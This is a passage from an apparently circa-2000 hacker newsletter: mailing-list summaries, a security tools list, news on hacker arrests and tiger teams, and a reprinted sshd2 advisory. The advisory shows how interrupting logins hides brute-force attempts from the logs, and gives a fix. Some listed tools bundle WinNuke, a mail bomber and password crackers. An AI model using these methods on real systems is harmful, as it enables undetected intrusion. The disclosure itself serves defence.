http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=Pine.GUL.4.21.0003142235580.21371-100000@red1.cac.washington.edu
8. TCP port 3218 (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000314232752.A6369@stwing.upenn.edu
9. Odd UPD scan (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=BC60D9A2A99CD311BB6B009027B09D2F02CE85@sea1sa02.punchnetworks.com
10. DUP packet replies at tvguide.com (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=200003151649.LAA18294@granger.mail.mindspring.net
11. Cracked; rootkit - entrapment question? (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=D6C7B533F7C4D311BBD800001D121E7F0152D9@clmail.cmccontrols.com
12. pop-2 scanning (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=20000315192246.524.qmail@securityfocus.com
13. Looking for Squid Proxies (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=200003161445.GAA01133@cwsys.cwsent.com
14. TCP port 3218 (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=XFMail.20000316120331.G.E.Fowler@lboro.ac.uk
15. what are these? (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=XFMail.20000316232929.djk@tobit.co.uk
V. VULN-DEV RESEARCH LIST SUMMARY
---------------------------------
1. Unwanted automagic processing (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=12UQKA-0005iM-00@gate.westel900.hu
2. MS Frontpage shtml.dll Path Leak Vulnerability (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=JEENLNLIMOLKDGAHKOCHEEPODAAA.marc@eeye.com
3. Hotline (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=NDBBJPBMKLJJBCHBNEAIOEIGCCAA.jlintz@optonline.net
4. Crashing Win9x (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=20000315085426.29030.cpmta@c008.sfo.cp.net
5. NT 4.0 (Workstation) Logon Authentication Vulnerability (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=NDBBIKOFOLKHBDNJIAKCEEJJCCAA.mrousseau@secured.org
6. Crashing Win9x with smbclient (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=20000315104542.B28738@trillian.adap.org
7. Intel Corporation, Express 550 (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=Pine.LNX.4.10.10003151605360.32739-100000@inetarena.com
8. spoofing the ethernet address (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=Pine.GSO.4.21.0003151412230.21920-100000@campus
9. Linux Mandrake 6.1 PAM/userhelper exploit (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-15&thread=38D169B5.5B1E1727@nitnet.com.br
10. Exploiting any network protocol with secondary data channels (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-15&thread=38D1FECA.6954A347@enternet.se
11. Buffer overflow in AIM 3.5.1856 (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-15&thread=38D52362.D0B1AEF2@rit.edu
VI. SECURITY JOBS SUMMARY 2000-03-13 to 2000-03-20
---------------------------------------------------
This section is unavailable this week - missed entries will be included in
next weeks 'week in review'.
VII. SECURITY SURVEY 2000-03-13 to 2000-03-20
-----------------------------------------------
Which remote accessing service presents the greatest security risks?
RPC/DCOM 21% / 34 votes
Web (including CGI) 28% / 45 votes
SSH 2% / 4 votes
FTP 5% / 8 votes
NFS/NETBIOS 20% / 32 votes
Telnet (incoming) 20% / 32 votes
Total number of votes: 156 votes
VIII. SECURITY FOCUS TOP 6 TOOLS 2000-03-13 to 2000-03-20
--------------------------------------------------------
1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT)
by RedShadow
Relevant URL:
http://www.rsh.kiev.ua
Shadow Advantis Administator Tools - Ping (SSPing), Port Scanner, , IP
Scanner, Site Info (is intended for fast definition of services started on
the host), Network Port Scanner,Tracert, Telnet,Nslookup,
Finger,Echo,Time,UPD test,File Info, Compare File, Netstat, SysInfo,Crypt,
Crc File, DBF view/edit, DiskInfo, NTprocess, Keyboard test, DNS info
Shadow Hack and Crack - WinNuke, Mail Bomber,POP3,HTTP,SOCKS,FTP Crack
(definitions of the password by a method of search),Unix password Crack,
Finger over SendMail, Buffer Overlow , Smb Password Check , CRK Files
ShadowPortGuard - code for detection of connection on the certain port
Shadow Novell NetWare Crack - code for breakings Novell NetWare 4.x And
more other functions
2. SecurityFocus.com Pager (Win95/98/NT)
by SecurityFocus.com
Relevant URL:
http://www.securityfocus.com/pager/sf_pgr20.zip
This program allows the user to monitor additions to the Security Focus
website without constantly maintaining an open browser. Sitting quietly in
the background, it polls the website at a user-specified interval and
alerts the user via a blinking icon in the system tray, a popup message or
both (also user-configurable).
3. Cold Fusion Scan 1.0 (Win95/98/NT)
by icos@arez.com
Relevant URL:
http://www.securityfocus.com/data/tools/cfscan.zip
Cold Fusion vulnerability scanner is a program that will run down a list
of words/domain names, and scan each one for an Allaire Cold Fusion
misconfiguration.
4. Atlas 1.0 (Win95/98)
by Digital Monkey, dmonkey@arctik.com
Relevant URL:
http://www.securityfocus.com/data/tools/Atlas.zip
A Windows/MS-DOS CGI scanner (binary only) which scans for 65 remote
vulnerabilities.
5. kfirewall 0.4.2 (Linux)
by Kim Andre Norheim, kim-nor@online.no
Relevant URLS:
http://www.securityfocus.com/data/tools/kfirewall-0.4.2.tar.gz
http://megaman.ypsilonia.net/kfirewall/
kfirewall is a GUI front end for ipchains or ipfwadm (depending on your
kernel version), in version 0.4.0 ipfwadm is removed. You can quickly and
easily protect your computer against attacks and blocking of ports.
kfirewall is easy and fast in use.
6. cgi scanner 3.6 (UNIX/PERL)
by CKS
Relevant URLS:
http://www.securityfocus.com/data/tools/auditing/network/cgichk3_6.tgz
http://www.singnet.com.sg/~cksss/
Cgi Scanner 3.6 is a simple program which facilitates the scanning of
hosts on a network for known cgi vulnerabilities. Upon finding a given cgi
program, the script will optionally download information from the author's
web page, detailing the exploit. 3.6 includes a fix for a y2k problem in
previous versions that would cause numerous false positives.
IX. SPONSOR INFORMATION - SecurityFocus.com
--------------------------------------------
SecurityFocus.com, the premier security information portal, has a new look
and more in-depth security content. Check out our redesigned site and new
Solaris Focus Area. Get the latest info on securing the Solaris OS--news,
vulnerabilities, white papers--in one, easy-to-navigate area. Click the
Solaris tab on the home page.
SecurityFocus.com-It's all here and it's all free.
X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
-------------------------------------
1. How do I subscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBSCRIBE SF-NEWS Lastname, Firstname
You will receive a confirmation request message to which you will have
to anwser.
2. How do I unsubscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed
address with a message body of:
UNSUBSCRIBE SF-NEWS
If your email address has changed email aleph1@securityfocus.com and I
will manualy remove you.
3. How do I disable mail delivery temporarily?
If you will are simply going in vacation you can turn off mail delivery
without unsubscribing by sending LISTSERV the command:
SET SF-NEWS NOMAIL
To turn back on e-mail delivery use the command:
SET SF-NEWS MAIL
4. Is the list available in a digest format?
Yes. The digest generated once a day.
5. How do I subscribe to the digest?
To subscribe to the digest join the list normally (see section 0.2.1)
and then send a message to LISTSERV@SECURITYFOCUS.COM with with a message
body of:
SET SF-NEWS DIGEST
6. How do I unsubscribe from the digest?
To turn the digest off send a message to LISTSERV with a message body
of:
SET SF-NEWS NODIGEST
If you want to unsubscribe from the list completely follow the
instructions of section 0.2.2 next.
7. I seem to not be able to unsubscribe. What is going on?
You are probably subscribed from a different address than that from
which you are sending commands to LISTSERV from. Either send email from
the appropiate address or email the moderator to be unsubscribed manually.
Alfred Huger
VP of Engineering
SecurityFocus.com
@HWA
116.0 You can get into trouble for hacking!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This piece comes from the Dept of Justice website, quite amusing actually..
Submitted by Sugarking
http://www.usdoj.gov/kidspage/do-dont/reckless.htm
YOU CAN GET IN REAL TROUBLE FOR HACKING!
Some kids think they can't get into trouble for hacking computer
systems and that hacking big networks like the phone company, the
military, or NASA is harmless fun. But that's not true, as one teenager
in Boston found out recently.
The hacker and some of his friends found a way to hack into a computer
that belongs to the phone company and that directs telephone traffic in
the Boston area. After he got into the system, the hacker decided to
reboot the computer, which basically made it crash. The first time he
did this, the hacker completely shut off phone service for six hours to
a regional airport so that the air traffic control tower had an
extrememly hard time communicating. The second time he crashed the
computer, he cut off phone service to about 600 homes.
The phone company reported this to the United States Secret Service,
which investigated the case and indentified all the kids involved.
Although the Justice Department does not prosecute juveniles very
often, the United States Attorney's Office in Boston charged the
ringleader of the group with several serious crimes.
Even though the student won't go to jail, he did receive very serious
punishment: he lost his computer, must pay $5000 to the telephone
company, and must work in the community for free for 250 hours. He will
also be on probation for the next two years, and during that time he is
not allowed to use any computer with a modem. That means, of course,
that he is off the Internet and all other networks.
DON'T LET THIS HAPPEN TO YOU! If you think about it, it's pretty easy
to see why this student got into so much trouble. How would you feel if
you were one of the 600 houses that lost phone service? What if you
needed to call 911? How would you feel if you had been flying into the
airport that lost telephone service?
The best way to stay out of trouble with computers is to imagine before
you do something how you'd feel if someone did it to you. You wouldn't
like it if someone opened your mail or looked into your bedroom
windows, and if you wouldn't do this either, don't hack into computers.
Lots of kids know enough about computers to hack into big networks, but
so what? It doesn't mean you're smart, it just means you don't mind
hurting other people--because it does hurt them. People are not going
to want to hire you to protect computers if you've been a hacker. It's
a question of trust, not skill.
If you like computers, don't use your brains to hack systems, invade
other people's privacy, and take away their networks. Hacking can get
you in a whole lot more trouble than you think and is a completely
creepy thing to do. If you're so smart, use that computer to do great
things!
@HWA
117.0 SSHD v2.0.11< (old) Watch your version numbers!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: (Bugtraq Archives)
http://msgs.securepoint.com/cgi-bin/get/bugtraq9905/75.html
Yes this IS old. But its here because recently someone was upgrading
from using ssh1 to ssh2 and almost installed an older version thinking
that any ssh2 implementation was secure (no names *wink*) so i've put
this here to remind people that knew and advise those that were unaware
of the possible threat... - Ed
Forum: BUGTRAQ (Admin)
Date: 1999, May 13
From: Patrick Oonk <patrick@PINE.NL>
Found this at http://www.jjf.org/advisory/SshdJJFen.txt
- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Date: 05/09/1999
Release: 05/14/1999
Author: Zhodiac <zhodiac@jjf.org>
URL: http://www.jjf.org
Application: sshd2 up to 2.0.11
OS: Unix
Risk: Risky :), long term could gain system access.
-=-=-=-=-=-=-=-=
Introduction
-=-=-=-=-=-=-=-=
In the default instalation of sshd2 (up to 2.0.11) there is an
open way to bruteforce a login/password, without any kind of ip
logging
by the sshd. Version 2.0.12 and newers seems to be not vulnerable to
this attack, because it logs the ip at connection time.
-=-=-=-=-=-=-=-=
Details
-=-=-=-=-=-=-=-=
When a ssh client connects to the daemon, it has a number
(default is three) of attempts to guess the correct password before
disconnecting. If we shutdown the connection before using up the
number
of attempts, the daemon will not log neither the connection, the
password guesses nor the ip of the client.
One cristal clear example:
[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password:
Disconnected; authentication error.
[zhodiac@piscis zhodiac]$
In /var/log/messages:
May 9 12:42:53 piscis sshd2[1391]: User authentication failed:
'Authentication method disabled. (user 'zhodiac', client address
'192.168.1.1:1344', requested service 'ssh-connection')'
Now we try the bug:
[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password: FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password: FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password: FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$
Those "FATAL: Received signal2." are the response of
interrupting the program with a ^C.
Lets see what syslog did:
May 9 12:44:41 piscis sshd2[1403]: Remote host disconnected:
Connection
closed.
May 9 12:44:44 piscis sshd2[1405]: Remote host disconnected:
Connection
closed.
May 9 12:44:47 piscis sshd2[1407]: Remote host disconnected:
Connection
closed.
No ip, no password guesses attempts on the logs!
So a bruteforce can be done without any kind of logging... Sorry
script-kiddies, no program available!
-=-=-=-=-=-=-=-=
Quick Fix
-=-=-=-=-=-=-=-=
Edit the file sshd2_config (usually at /etc/ssh2), set the value
of "PasswordGuesses" to 1. With this each time a password is tried it
will log it in the following way:
May 9 12:46:07 piscis sshd[1308]: User authentication failed:
'Authentication method disabled. (user 'zhodiac', client address
'192.168.1.1:1527', requested service 'ssh-connection')'
It is also recommended to set the value of "ListenAddress" so we
will have more control of which ips can use our ssh service.
A better solution is to upgrade to 2.0.12 version or newer , with
them at connection it will log via syslog in the following way:
May 9 15:23:33 piscis sshd2[7184]: connection from "192.168.1.1"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
zhodiac@jjf.org
http://www.jjf.org
- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--
Patrick Oonk - PO1-6BONE - patrick@pine.nl - www.pine.nl/~patrick
Pine Internet B.V. Consultancy, installatie en beheer
Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/
-- Pine Security Digest - http://security.pine.nl/ (Dutch) ----
Excuse of the day: Feature was not beta tested
@HWA
118.0 BBC:"Outdoing the hackers"
~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by MerXor
Source:http://news2.thls.bbc.co.uk/hi/english/business/newsid%5F689000/689285.stm
Friday, 24 March, 2000, 18:02 GMT
Outdoing the hackers
By BBC News Online's Iain Rodger
Imagine a team of people spending all their time thinking up ways of
hacking into corporate computer networks.
Now imagine them, Mission Impossible-style, breaking into the inner
sanctum itself - the main computer room.
These teams actually exist and, more remarkably, they work largely from
within the big firms of accountants.
Known as "tiger teams", their brief is to find the holes in the security
of their corporate clients before criminal hackers do.
Brick trick
Jan Babiak is head of Ernst & Young's IT security practice. She told me
how one of her firm's tiger teams broke into the computer room of a major
North American client, deposited a brick marked "Ernst & Young was here"
and left again undetected.
They then contacted the firm's bosses and said: "Come and see what we've
done."
What a great job, don't you think? Kind of James Bond without the
disincentive of being shot at. But, of course, it's not quite as simple as
that.
Most of the time, the teams are methodically trying to crack passwords to
find a chink in the armour of supposedly secure sites.
Chris Potter, partner in charge of similar operations at Pricewaterhouse
Coopers, said his 50-strong UK team mainly tries to replicate the
techniques of illegal hackers to probe here and there until weaknesses are
identified.
Physical break-ins would be rare, he said, and used only when the client
had agreed it was appropriate.
Jan Babiak also stressed the importance of not being alarmist: "The
smartest thing to do is to understand your risks."
Then, she said, you can develop cost-effective responses that deal with
the risk in a way that "delivers good value to shareholders". Now there's
the accountant speaking.
How it's done
Often using people with backgrounds in military espionage, tiger teams
(the name is derived from the American armed forces) use all kinds of
tricks to ply their trade.
For example, they might mount an attempt to hack into a company round the
corner via servers dotted all over the world, making it virtually
impossible to detect where the attack is coming from.
As the idea is to find the weaknesses in even the most sophisticated
security, a wide range of techniques might be used, from wire-tapping to
cracking passwords.
A small programme might be secreted on the target system which records and
transmits keystrokes from given terminals. On the basis that the password
is typed within the first 40 keystrokes, it is then relatively easy to
find.
But, as Chris Potter says, the biggest weaknesses are usually not in the
technology but in the "human element", and this is where the other side,
known as "social engineering" comes in.
In one case, a female member of a tiger team used the age-old weapon of
tears to persuade an employee of a target client to give her password
details.
In another, a visit to an office masquerading as a cleaner was used to
obtain information about personal belongings placed around work terminals.
Some Arsenal football club pictures were enough of a clue to make cracking
the employee's password easy work.
Making robust systems
Having identified the weaknesses, the team then gives advice on how to
change the security system to make it more effective, or even design a
system specifically for the client.
Ken Cukier, international editor with technology magazine Red Herring,
says the tiger teams provide an essential service in developing robust IT
infrastructures.
The business is certainly growing fast - Ernst & Young's team has
quadrupled in size in two years.
But Mr Cukier says the talents needed to design a secure system and break
that security are not the same, so there needs to be a three-pronged
approach to get the best results.
He says the tiger teams are great for checking that a system works, but
that they tend to rely on long experience of established technques.
Bright young things
This can miss out the new ways of hacking being thought up by bright young
things messing about with cutting-edge technology on the fringes of
Silicon Valley.
Many of them do not want to work for multinational firms and have been
founding their own internet start-ups, realising that they have highly
marketable skills.
Mr Cukier says combining the tiger teams with the bright young things,
along with awareness of the need for constant monitoring of how hacking
techniques are changing, produces the best results.
He says: "The best you can ever hope for is to be one step ahead of the
hackers."
@HWA
119.0 HNN:Mar 27th:Curador Busted In Wales (See section 110.0 for more)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Brian
Curador (Raphael Gray), suspected of stealing thousands of credit
cards from at least nine e-commerce sites and posting them to the
Internet , was arrested in Wales last week. Some of Curador's victims
included Promobility, a wireless phone merchant in Ontario;
SalesGate.com in Buffalo, New York; LTA Media LLC in Knoxville,
Tennessee; and Feelgoodfalls.com in Denver. Curador and his accomplice
are expected to be charged under Britain's Computer Misuse Act of 1990
for the theft and fraudulent use of more than 26,000 credit card
numbers. Additional charges may be filed within the United States.
(Some news outlets are reporting that Curador got a hold of Bill Gates
Credit Card info. This was proven to be false several weeks ago. It
looks like the UK Telegraph was the first to mention it, and of course
several of the wire services picked it up without verifying the
information. Don't believe everything you read.)
Internet News
Associated Press - via Yahoo
Reuters
BBC
CNN
C|Net
MSNBC
UK Telegraph
Attrition.org - Mirrors of Curador's Web Sites
http://www.internetnews.com/ec-news/article/0,2171,4_327181,00.
http://dailynews.yahoo.com/h/ap/20000324/tc/hackers_england_2.
http://dailynews.yahoo.com/h/nm/20000324/wr/tech_hackers_1.html
http://news2.thls.bbc.co.uk/hi/english/uk/wales/newsid%5F689000
http://www.cnn.com/2000/TECH/computing/03/24/hackers.wales/
http://news.cnet.com/news/0-1007-200-1583595.html?tag
http://export.msnbc.com/news/386402.asp
http://www.telegraph.co.uk/et?ac
http://www.attrition.org/mirror/attrition/curador.html
----------
@HWA
120.0 HNN:Mar 27th:Inferno Busted in Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Jackie Chan
The Inferno.br, one of the main underground groups in Brazil, was
dismantled last Tuesday by the Sector of Crimes for the Internet of
the Civil Policy of Sao Paulo. One of the leaders of the group, known
as Jamiez Jamiez or JZ, was apprehended at his residence and had his
computer and all related material confiscated. The Inferno had been
active since September of 1998 and has taken credit for the defacement
of several web pages. Agents involved with the case claim that
Microsoft helped them in gaining access to the groups Hotmail account.
Investigators expect more arrests of group members in the next few
days. (Note: Information for this article was gathered from a
Babelfish Translation and may not be perfect.)
IDG Brazil - Portuguese
Attrition - Mirrors of Inferno.br Defacements
http://www.uol.com.br/idgnow/inet/inet2000-03-23g.shl
http://www.attrition.org/mirror/attrition/inferno.html
----------
@HWA
121.0 HNN:Mar 27th:OSU Students Accused of Stealing Bandwidth
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by lannachi
Payne County prosecutors have accused four Oklahoma State University
students of computer fraud. The charges arose after the students ran a
cable from a university computer lab to their rooms in Stout Hall. The
students were arraigned last week for violation of the computer crimes
act.
Tulsa World - at bottom of page
http://search.tulsaworld.com/archivesearch/default.asp?WCI
----------
Server object error 'ASP 0177 : 800a2330'
Server.CreateObject Failed
/archivesearch/default.asp, line 13
The operation completed successfully.
( IOW: it's a 404 ... sorry... BTW if anyone finds, has cached or
otherwise stored any missing stories please email the article to me
and please reference section # and Issue # ie: 121.0 Issue #52 ...
and i'll post it in a future release. Thanks. - Ed )
@HWA
122.0 HNN:Mar 27th:PalmPilot WarDialer Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Kingpin
Vaporware for almost two years the PalmPilot WarDialer known as TBA
has been released by Kingpin from L0pht Labs at @Stake. This release
expands the possibilities of security scanning and is much cheaper
than commercial alternatives, it is FREE.
L0pht Labs Palm OS Development
http://www.l0pht.com/~kingpin/pilot.html
----------
@HWA
123.0 HNN:Mar 27th:Mi5 Computer Stolen
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by dubpunk
It is crucial to remember that your computer security is only as good
as your physical security. MI5, the British Secret Service, has
announced that it will tighten its security procedures after a laptop
was recently stolen from an agent. MI5 admitted that the laptop may
contain information related to Northern Ireland but that it does not
contain any sensitive material.
This is London
Reuters - via Iwon
http://www.thisislondon.com/dynamic/news/reprint.html?in_review
http://www.iwon.com/home/technology/tech_article/0,2109,23766|technolo
gy|03-24-2000::23:52|reuters,00.html
----------
ORA-06550: line 3, column 11: PLS-00306: wrong
number or types of arguments in call to
'F_VANILLA_REVIEW' ORA-06550: line 3, column 1:
PL/SQL: Statement ignored
(*SIGH* and ho-hum.. not having a lot of luck capturing articles from
some of these new news sites recently!... 404 again on 1st url ...
'thisislondon*' ...sorry... - Ed )
-=-
British Intelligence Laptop Stolen at Station
March 24, 2000 10:51 am EST
LONDON (Reuters) - British police said Friday they were hunting a thief
who had stolen a secret service computer containing confidential
information on Northern Ireland.
The laptop computer was snatched while an employee of Britain's domestic
security service, MI5, was buying a ticket at London's Paddington train
station.
"I can confirm that a laptop computer was stolen from the security
service employee on March 4 at Paddington Underground (station)," said a
government official who declined to be identified.
"The information contained in the laptop was well protected and we
believe it to be secure. We are not prepared to discuss the nature of the
material."
The information on the computer was understood to be heavily encrypted
and was related to the situation in Northern Ireland, but not to refer to
the state of the peace process or any guerrilla threat.
A spokesman for Prime Minister Tony Blair said officials were always
concerned at the loss of any sensitive material, but they were confident
it was secure and that national security had not been threatened.
"We believe this is an opportunistic theft and not a deliberate attempt
to gain access to security service information," he said.
Asked why agents were walking around with security information on
computers, the spokesman said there were strict procedures for moving
classified material. "You can certainly say they've been tightened
since this incident," he added.
The Sun newspaper said a squad of 150 police were working around the
clock to catch the thief. Before the start of the 1991 Gulf War in Kuwait
and Iraq, a laptop said to have contained war plans was stolen
from the car of a Royal Air Force officer, who lost his job as a result.
The latest theft comes as the peace process in Northern Ireland is in
disarray.
Last month Britain decided to suspend a fledgling home-rule government
over lack of progress on disarmament by Irish Republican Army guerrillas.
(For those of you not living in the United Kingdom or Ireland, this is
a VERY BAD SCENE to have happen, Brits live in fear of the threat of
terrorist bomb attacks on a daily basis and any intelligence to help
the murdererous IRA and rogue factions could be devestating to any
hope of peace in the UK and Northern Ireland ... - Ed)
@HWA
124.0 HNN:Mar 27th:"HNN Wins Bad Ass Media Award"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by SmackDabMedia Mail
The Hacker News Network has won the prestigious Bad Ass Media Site of
the Week awarded by Smack Dab Media.
Smack Dab Media
http://www.smackdabmedia.com/badassmediasiteoftheweek.html?004
----------
(Sorry! article has moved! who knows where!? - Ed ...)
@HWA
125.0 HNN:Mar 28th:French Ban Anonymous Internet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
The French National Assembly has voted on a bill to ban anonymous web
hosting. Providing false information to an Internet service provider
could result in a six month jail sentence. The Assembly will take one
more vote on the bill before it becomes law.
French National Assembly - PDF in French
http://www.assemblee-nat.fr/2/pdf/ta0473-01.pdf
----------
@HWA
126.0 HNN:Mar 28th:Canada Labeled Hot bed of Computer Terrorism
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
An American intelligence agency has determined that up to 80 percent
of foreign attacks on U.S. computers either originate or pass through
Canada. The claim follows suspicions that some recent attacks were
routed through Canadian computers.
E-Commerce Times
News Bytes
http://www.ecommercetimes.com/news/articles2000/000327-nb1.shtml
http://www.newsbytes.com/pubNews/00/146343.html
----------
Canada Called Hotbed of Cyberterrorism By Martin Stone, Newsbytes Special
to the E-Commerce Times March 27, 2000
An American intelligence agency has determined that up to
80 percent of foreign attacks on U.S. computers either
originate or pass through Canada. The claim
follows suspicions that some recent hacker attacks were
routed through Canadian computers.
A weekend article by the Ottawa Citizen newspaper said a
report prepared last year for Canada's Department of
National Defence quotes the U.S. Defence
Intelligence Agency, the military counterpart to the CIA,
as warning that Canada is seen as a "Zone of
Vulnerability."
The U.S. Defence Intelligence Agency estimates that a full 80 percent of
the attacks upon U.S. systems originate in or pass through Canada, the
report stated. The Citizen noted that the report, prepared by
Canadian military and intelligence agencies, including the ultra-secret
Communications Security establishment, further said, "It is the assessment
of the (Canadian government's) Intelligence Policy Group that the United
States and our allies will expect Canada to participate in combating and
reducing the cyber threat."
Hacker Haven
FBI Director Louis Freeh recently called Canada a "hacker haven." FBI
investigators believe one or more Canadian Internet servers were used in
the attacks that recently disabled Yahoo!, eBay and other U.S.-based
commercial sites.
Colonel Randy Alward, commander of the Canadian Forces Information
Operations Group, is quoted by the newspaper as saying the high number of
hacker attacks coming from Canada is due to a high degree of
computerization. The colonel is reported as saying that Canada is a very
wired country and that hackers will typically bounce through different
computer systems to hide their original location.
Welsh Teens Stage Attacks
The newspaper noted that Canadians, too, can also be the victims of
cybercrimes and cited reports of two teenagers in Wales who were recently
arrested following an international investigation by the FBI and the
Royal Canadian Mounted Police.
The 18-year-olds allegedly used the alias "Curador" to hack into nine
e-commerce sites, at least one of which was Canadian, from which they are
believed to have stolen more than 26,000 credit card numbers and
other personal information, and posted some of it to other hackers.
The Citizen said the cost of canceling the cards and issuing new ones will
exceed $3 million (US$), and there may be additional losses if the
information was used by others to make purchases.
However, Sam Porteous, director of intelligence for Kroll Associates
Canada, a corporate security firm, warned against taking the intelligence
estimates too seriously, saying the military often uses broad
definitions of what constitutes a cyberattack. He conceded, though that
Americans have valid concerns about Canada, seeing the country as a
conduit they don't have control over, and that unnerves them, he told the
newspaper.
The Citizen cites other cyberwarfare specialists who acknowledge that,
while that Canada has a large population of computer literate citizens,
question whether the number of Canadian-launched attacks are as high
as the intelligence report suggests. Thomas Welch of JAWS Technologies, a
computer security firm with U.S. and Canadian offices, said he believes
the report overstates Canada's role in cyberterrorism and that, while a
good percentage does go through or come from Canada, a large percentage of
attacks on Canadian sites go via the United States.
-=-
We have some packet kiddies and wannabe crackers make the news and now
we're public enemy #1 ... phear Canada .. *gag* (kill the media) - Ed
now excuse me while I load the molson's canadian into my igloo off the
skidoo trailer and club some baby seals for supper ... :-o
=-=
Canada Called Hotbed Of Cyberterrorism
By Martin Stone, Newsbytes OTTAWA, ONTARIO, CANADA, 27 Mar 2000, 8:41 AM
CST
An American intelligence agency has determined that up to 80 percent of
foreign attacks on US computers either originate or pass through Canada.
The claim follows suspicions that some recent hacker attacks were routed
through Canadian computers.
A weekend article by the Ottawa Citizen newspaper said a report prepared
last year for Canada's Department of National Defence quotes the US
Defence Intelligence Agency, the military counterpart to the CIA, as
warning that Canada is seen as a "Zone of Vulnerability."
The US Defence Intelligence Agency estimates that a full 80 percent of the
attacks upon US systems originate in or pass through Canada, the report
stated. The Citizen noted that the report, prepared by Canadian military
and intelligence agencies, including the ultra-secret Communications
Security establishment, further said, "It is the assessment of the
(Canadian government's) Intelligence Policy Group that the United States
and our allies will expect Canada to participate in combating and reducing
the cyber threat."
FBI Director Louis Freeh recently called Canada a "hacker haven." FBI
investigators believe one or more Canadian Internet servers were used in
the attacks that recently disabled Yahoo.com, eBay and other US-based
commercial sites.
Colonel Randy Alward, commander of the Canadian Forces Information
Operations Group, is quoted by the newspaper as saying the high number of
hacker attacks coming from Canada is due to a high degree of
computerization. The colonel is reported as saying that Canada is a very
wired country and that hackers will typically bounce through different
computer systems to hide their original location.
The newspaper noted that Canadians, too, can also be the victims of
cybercrimes and cited reports of two teenagers in Wales who were recently
arrested following an international investigation by the FBI and the Royal
Canadian Mounted Police.
The 18-year-olds allegedly used the alias "Curador" to hack into nine
e-commerce sites, at least one of which was Canadian, from which they are
believed to have stolen more than 26,000 credit card numbers and other
personal information, and posted some of it to other hackers.
The Citizen said the cost of canceling the cards and issuing new ones will
exceed $3 million, and there may be additional losses if the information
was used by others to make purchases.
However, Sam Porteous, director of intelligence for Kroll Associates
Canada, a corporate security firm, warned against taking the intelligence
estimates too seriously, saying the military often uses broad definitions
of what constitutes a cyberattack. He conceded, though that Americans have
valid concerns about Canada, seeing the country as a conduit they don't
control over, and that unnerves them, he told the newspaper.
The Citizen cites other cyberwarfare specialists who acknowledge that,
while that Canada has a large population of computer literate citizens,
question whether the number of Canadian-launched attacks are as high as
the intelligence report suggests. Thomas Welch of JAWS Technologies, a
computer security firm with US and Canadian offices, said he believes the
report overstates Canada's role in cyberterrorism and that, while a good
percentage does go through or come from Canada, a large percentage of
attacks on Canadian sites go via the US.
Reported by Newsbytes.com, http://www.newsbytes.com .
